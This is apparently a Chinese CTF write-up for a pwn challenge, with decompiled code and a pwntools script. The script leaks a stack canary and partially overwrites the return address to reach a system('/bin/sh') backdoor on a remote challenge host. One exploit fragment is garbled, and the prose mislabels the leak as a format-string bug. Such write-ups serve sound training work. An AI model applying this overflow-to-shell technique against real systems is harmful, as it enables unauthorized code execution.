

1     Arch:     amd64-64-little
2 RELRO: Partial RELRO
3 Stack: Canary found
4 NX: NX enabled
5 PIE: PIE enabled


 1 __int64 sub_960()
2 {
3 __int64 buf[6]; // [rsp+0h] [rbp-30h] BYREF
5 buf[5] = __readfsqword(0x28u);
6 setvbuf(stdin, 0LL, 2, 0LL);
7 setvbuf(_bss_start, 0LL, 2, 0LL);
8 buf[0] = 0LL;
9 buf[1] = 0LL;
10 buf[2] = 0LL;
11 buf[3] = 0LL;
12 puts("Input your Name:");
13 read(0, buf, 0x30uLL);
14 printf("Hello %s:\n", (const char *)buf);
15 read(0, buf, 0x60uLL);
16 return 0LL;
17 }
1 int sub_A3E()
2 {
3 return system("/bin/sh");
4 }
 1 .text:0000000000000960 sub_960         proc near               ; CODE XREF: main+14↓p
2 .text:0000000000000960
3 .text:0000000000000960 buf = qword ptr -30h
4 .text:0000000000000960 var_28 = qword ptr -28h
5 .text:0000000000000960 var_20 = qword ptr -20h
6 .text:0000000000000960 var_18 = qword ptr -18h
7 .text:0000000000000960 var_8 = qword ptr -8
8 .text:0000000000000960
9 .text:0000000000000960 ; __unwind {
10 .text:0000000000000960 push rbp
11 .text:0000000000000961 mov rbp, rsp
12 .text:0000000000000964 sub rsp, 30h
13 .text:0000000000000968 mov rax, fs:28h
14 .text:0000000000000971 mov [rbp+var_8], rax
15 .text:0000000000000975 xor eax, eax
16 .text:0000000000000977 mov rax, cs:stdin
17 .text:000000000000097E mov ecx, 0 ; n
18 .text:0000000000000983 mov edx, 2 ; modes
19 .text:0000000000000988 mov esi, 0 ; buf
20 .text:000000000000098D mov rdi, rax ; stream
21 .text:0000000000000990 call _setvbuf
22 .text:0000000000000995 mov rax, cs:__bss_start
23 .text:000000000000099C mov ecx, 0 ; n
24 .text:00000000000009A1 mov edx, 2 ; modes
25 .text:00000000000009A6 mov esi, 0 ; buf
26 .text:00000000000009AB mov rdi, rax ; stream
27 .text:00000000000009AE call _setvbuf
28 .text:00000000000009B3 mov [rbp+buf], 0
29 .text:00000000000009BB mov [rbp+var_28], 0
30 .text:00000000000009C3 mov [rbp+var_20], 0
31 .text:00000000000009CB mov [rbp+var_18], 0
32 .text:00000000000009D3 lea rdi, s ; "Input your Name:"
33 .text:00000000000009DA call _puts
34 .text:00000000000009DF lea rax, [rbp+buf]
35 .text:00000000000009E3 mov edx, 30h ; '0' ; nbytes
36 .text:00000000000009E8 mov rsi, rax ; buf
37 .text:00000000000009EB mov edi, 0 ; fd
38 .text:00000000000009F0 call _read
39 .text:00000000000009F5 lea rax, [rbp+buf]
40 .text:00000000000009F9 mov rsi, rax
41 .text:00000000000009FC lea rdi, format ; "Hello %s:\n"
42 .text:0000000000000A03 mov eax, 0
43 .text:0000000000000A08 call _printf
44 .text:0000000000000A0D lea rax, [rbp+buf]
45 .text:0000000000000A11 mov edx, 60h ; '`' ; nbytes
46 .text:0000000000000A16 mov rsi, rax ; buf
47 .text:0000000000000A19 mov edi, 0 ; fd
48 .text:0000000000000A1E call _read
49 .text:0000000000000A23 mov eax, 0
50 .text:0000000000000A28 mov rcx, [rbp+var_8]
51 .text:0000000000000A2C xor rcx, fs:28h
52 .text:0000000000000A35 jz short locret_A3C
53 .text:0000000000000A37 call ___stack_chk_fail
54 .text:0000000000000A3C ; ---------------------------------------------------------------------------
55 .text:0000000000000A3C
56 .text:0000000000000A3C locret_A3C: ; CODE XREF: sub_960+D5↑j
57 .text:0000000000000A3C leave
58 .text:0000000000000A3D retn
59 .text:0000000000000A3D ; } // starts at 960
60 .text:0000000000000A3D sub_960 endp
61 .text:0000000000000A3D
62 .text:0000000000000A3E
63 .text:0000000000000A3E ; =============== S U B R O U T I N E =======================================
64 .text:0000000000000A3E
65 .text:0000000000000A3E ; Attributes: bp-based frame
66 .text:0000000000000A3E
67 .text:0000000000000A3E sub_A3E proc near
68 .text:0000000000000A3E ; __unwind {
69 .text:0000000000000A3E push rbp
70 .text:0000000000000A3F mov rbp, rsp
71 .text:0000000000000A42 lea rdi, command ; "/bin/sh"
72 .text:0000000000000A49 call _system
73 .text:0000000000000A4E nop
74 .text:0000000000000A4F pop rbp
75 .text:0000000000000A50 retn
76 .text:0000000000000A50 ; } // starts at A3E
77 .text:0000000000000A50 sub_A3E endp

有个格式化字符串漏洞可以泄露canary,由于pie的开启,IDA里只显示后三位,发现后门函数地址后三位是 A3E ,和用gdb调出来的返回地址 A6A 只相差最后一个字节,由于小端序存储,我们可以直接部分字节写入,改返回地址为后门函数,即可getshell。以下附上exp:

from pwn import *

def pwn():
s =remote('node4.buuoj.cn',27982)
s.recvuntil(b'Input your Name:\n')
success(hex(canary)) payload=b'a'*0x28+p64(canary)+p64(0)+b'\x3e'



 1 from pwn import *
3 def pwn():
4 s.recvuntil(b'Input your Name:\n')
5 s.sendline(b'a'*0x28)
6 s.recvuntil(b'a'*0x28)
7 canary=u64(s.recv(8))-0xa
8 success(hex(canary))
10 payload=b'a'*0x28+p64(canary)+p64(0)+b'\x3e\xaa'
11 s.recvuntil(b':\n')
12 s.send(payload)
13 s.sendline(b'ls')
14 k=s.recv()
15 return k
18 if __name__ == '__main__':
19 while True:
20 s =remote('node4.buuoj.cn',26877)
21 k=pwn()
22 if(b'bin' in k):
23 s.interactive()
24 break
25 s.close()


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